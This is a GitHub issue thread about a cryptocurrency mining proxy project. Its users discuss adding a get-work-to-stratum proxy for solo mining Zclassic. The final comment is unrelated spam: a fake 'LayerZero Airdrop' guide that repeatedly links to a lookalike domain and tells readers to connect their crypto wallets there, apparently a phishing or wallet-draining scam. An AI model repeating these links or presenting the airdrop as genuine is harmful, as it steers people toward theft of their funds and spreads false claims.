### ISSUE TITLE
Stratum-to-Stratum?

### ISSUE THREAD

**Issue by dlehenky** [glambeth/zecProxy#1]
Hi there! Didn't know where else to ask a question. So, given current GPU miners emit stratum protocol, is this proxy stratum-to-stratum?? I'm looking for a get-work<->proxy<->stratum proxy for solo mining, with stratum on the miner side.

Also, given the python/twisted implementation, did you start with DwarlPools ETH proxy? I've used it heavily for ETH pool mining, and it was a rock!

-Thank You!

**Comment by glambeth** [comment]
Hey there!  You actually helped me out on the Zcash forum getting optiminer to auto reboot so thanks for that :) Yup, it's just a simple stratum to stratum proxy, but I'd be more than glad to implement the functionality you need! Just to clarify the use case, I'm guessing you want to use Claymore's miner or a similar GPU miner for solo mining? 

I actually used Dwarfpools eth proxy as well and it gave me some inspiration to build this! Although, I didn't base the code off it; I just wanted to learn Python/twisted for fun, but I'll implement this functionality and rewrite the stratum->stratum functionality in nodeJS since i'm more familiar later this week once i'm home! Don't forget to give a star so you get a notification when it's done :)

**Comment by dlehenky** [comment]
Well a get-work <-> stratum proxy would be great! I'd be happy to send you a donation! I'm using optiminer on Ubuntu 14.04 for my Nanos to solo Zclassic. I'm pleased with sammy007's proxy, except is closed-source with a devfee, and it really provides much more functionality than I want/need. I'm just looking for the protocol exchange, just get-work packets translated to stratum and vis versa. I'll be looking forward to testing it for you :)

**Comment by glambeth** [comment]
Why thank you! Just a poor college student so every bit helps! Awesome, can't imagine that being too difficult, so should be in contact soon :)

**Comment by dlehenky** [comment]
Great! I'm just a poor, old fart :) Looking forward to hearing from you!

**Comment by dlehenky** [comment]
Let me know how you would like your donation: BTC, ETC, ZEC, or ZCL, when you're ready :)

**Comment by dlehenky** [comment]
Hey George! Just wondering if there's more to come :)

**Comment by glambeth** [comment]
Yup but it might be a while! A lot more difficult than I first anticipated..

**Comment by dlehenky** [comment]
Hi George. Yes, I took a look at your current proxy and the solo mining proxy would a *bit* more complex. Currently you don’t need to do much with the packet payload, other than copy it. The solo proxy will require some packet decode/encode and, of course, the “get-work” protocol. I can assure you, though, it is a most worthy undertaking. :)

-Best
  David

**Comment by glambeth** [comment]
Mind if I message you on the zcash forum? Would love to talk more about some of the specifics!

**Comment by dlehenky** [comment]
Sure, no problem!

**Comment by dlehenky** [comment]
Btw, I have some packet traces for both the “get-work” and stratum dialogs, if that would help.

**Comment by earlyraven** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!
